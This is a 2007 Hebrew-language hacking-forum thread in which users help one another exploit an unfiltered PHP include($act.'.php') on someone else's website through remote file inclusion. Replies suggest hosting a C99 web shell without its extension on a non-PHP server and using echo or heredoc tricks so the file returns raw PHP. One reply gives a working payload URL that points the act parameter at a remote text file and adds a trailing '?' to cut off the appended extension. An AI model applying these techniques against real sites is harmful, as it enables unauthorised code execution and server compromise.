15/03/2007 22:01:24
L[s]D
יש אתר שמשלב עמוד מסויים ככה:
include($act.".php");
הACT בא מהכתובת.. ולא עובר שום סינון ושום IF... יש דרך לנצל את זה בתור RFI? ואם לא.. אז איך אפשר לנצל את זה?
15/03/2007 22:22:20
T4uSBaZ
אני חושב שאתה יכול להעלות קוד PHP עם סיומת וכו’ לשרת שלא תומך בPHP כך שיכנסו לקובץ ויראו את הקוד והוא לא יפעל. ואז אתה נותן בכתובת את הכתובת של הPHP אבל בלי הסיומת..
15/03/2007 22:32:44
masternetwork
נכוןן. תעלה לשרת קובץ בבלי סיומת את הקובץ C99 או משהו.. איזהשהו shell ואז תשים אותו ב act בלי הסיומת זה שם סיומת אוטומטית..
15/03/2007 22:42:35
L[s]D
ואלה רעיון טוב.. שניה אני אנסה
15/03/2007 22:55:39
L[s]D
סורי על הדאבל.. אי אפשר לערוך.. ניסיתי להעלות לנענע (הם לא תומכים בPHP) ולהכניס לשם את זה.. אבל זה לא עובד.. הוא פשוט לא מראה כלום.. אבל משום מה גם כשאני נכנס רגיל לעמוד הזה בPHP שבניתי.. נענע מציגים לי שגיאה שהעמוד לא קיים.. אבל אני רואה אותו בלוח בקרה בנענע...
15/03/2007 23:21:36
HLL
תעלה קובץ ללא סיומת ותדאג שהוא יחזיר מיים טייפ text\ascii כמובן זה צריך להיות דף PHP, אבל כשאתה פותח אותו באקספלורר אתה אמור לראות את הקוד, ולא את הפלט. זה אמור לעבוד בהצלחה.
15/03/2007 23:28:02
L[s]D
לא הבנתי.. מזתאמרת הוא צריך להחזיר מיים טייפ? הוא ישלב אותו עם סיומת PHP.. והסיומת כידוע היא חלק מהשם.. אז הוא פשוט לא ימצא את הקובץ אם אני לא טועה
15/03/2007 23:29:36
HLL
סעמק התבלבלתי לרגע הכוונה היא שהקובץ יהיה .php אבל בפלט שלו חייב לחזור, קוד PHP ,ולא פלט של הדף PHP ... ... בתור קלט למערכת תכניס את הנתיב לקובץ, ללא .php...
15/03/2007 23:32:49
L[s]D
כאילו... לעשות קובץ PHP רגיל.. רק לא לפתוח תגיות של PHP.. יענו בלי - ?> ?
15/03/2007 23:36:49
HLL
כדי לאנקלד קובץ PHP מקובץ PHP כזכור לי לשניהם אמורות להיות תגית PHP אבל תעשה משהוא בסגנון קוד:echo <<<EOF; <? .......................... ................................ echo "mowhwhw hacked.";
?> EOF; אל תקח אותי בתחביר... אם זה מפחיד אותך אז תדע שיש כזה תחביר מגניב שמאפשר לך לכתוב בלי הגבלה בתוך קוד PHP בצורה הנ"ל (www.php.net) בקיצור, כשאתה פותח קובץ PHP מקומים בנוטפאד, שזה יראה כמו קובץ על השרת באקספלורר.
15/03/2007 23:40:25
masternetwork
אתה צריך לעשות ככה X זה איך אתה לא צריך לעשות V זה איך אתה צריך לעשות ============================ X: שם הקובץ index.php V: שם הקובץ: index ===== X: לא לשים תגיות פתיחה וסגירה V: לשים תגיות פתיחה וסגירה ======== מקווה שהבנת שאתה צריך להכין את הקובץ אם הקודים ממש של PHP רק לא לשים סיומת של PHP שאתה שומר את הקובץ.. === :] נ.ב עדיין לא אישרת אותי באייסי חח..
15/03/2007 23:42:20
HLL
להיפך... קוד:include($act.".php"); הקובץ שלך חייב להסתיים ב .php
15/03/2007 23:44:09
masternetwork
לא! אתה לא רואה שב include יש כבר את הסיומת.. אתה פשוט צריך לשים ב act את הקובץ ללא הסיומת וזה יצא השם של הקובץ הנכון.. אם תכתוב ב act index.php אז זה יעשה include לקובץ: index.php.php
אם תעשה include לקובץ index זה יצא index.php מקווה שהבנת..
15/03/2007 23:45:10
HLL
נכון אבל אני מצטט אותך " רק לא לשים סיומת של PHP שאתה שומר את הקובץ.. "
מסכים שב act= אמור להיות השם ללא הסיומת.
15/03/2007 23:45:51
L[s]D
כן אני יודע... אבל כתבתי שכבר ניסיתי את זה והוא פשוט לא מתיחס את הקובץ ככה.. אולי זה בגלל השרת הדפוק של נענע.. יש למישהו שרת אחר שלא תומך בPHP? ולהלל.. לא הבנתי תקטע עם הEOF והחצים.. יש מצב אתה מסביר לי על זה? או שזה לא חשוב ולא קשור לנושא?
15/03/2007 23:46:55
HLL
http://il.php.net/echo
15/03/2007 23:48:14
masternetwork
תראה את הקובץ PHP? את הקוד?.. האיסיי 227728 שלח לי אותו.. או שתעלה פה קישור אל הקובץ...
15/03/2007 23:50:39
L[s]D
אהה אוקיי הבנתי... יש מצב לשרת אחר? כי יכול להיות שהבעיה היא בנענע..
15/03/2007 23:52:38
HLL
900913 (GooGlE?)
16/03/2007 00:15:31
masternetwork
HLL: ניסיתי להעלאות קובץ כזה לשרת שתומך בPHP.. קוד: <? echo ’<? echo "Cool"; ?>’; ?>
וזה גם לא עזר.. יש למישהו רעיון?
*עריכה* וזה בקוד מציג איך שזה אמור להיות שאני מפעיל את הקובץ זה מציג: קוד: <? echo "Cool"; ?> כמו שזה אמור להיות.. אבל בשרת עצמו שיש את ה include זה לא מראה משום מה.. רעיונות[?!][ההודעה נערכה על-ידי masternetwork ב-16/03/2007 00:16:49]
16/03/2007 07:08:04
SkOd
תעלה קובץ טקסט ל nana: קוד: <?php echo "Ouch"; ?>
ואז תכנס לאתר שלך ככה: קוד:http://host/index.php?act=http://planetnana.co.il/user/phpinj.txt? *אל תשכח את ה "?".[ההודעה נערכה על-ידי SkOd ב-16/03/2007 07:10:11]
16/03/2007 12:46:42
T4uSBaZ
צודק.. דרך אגב פלנט נענע סאקס, שים על שרת אחר (ועכשיו אתה יכול גם TXT תודות ל SKOD)
16/03/2007 12:57:39
tweester
יכול להיות שלא הבנתי כל כך טוב אבל מה הבעיה כיאלו לעלות עמוד של C99 למה?
ואם הבנתי נכון אז הפונקציה die אמורה לעזור לך לא?
עמודים:
1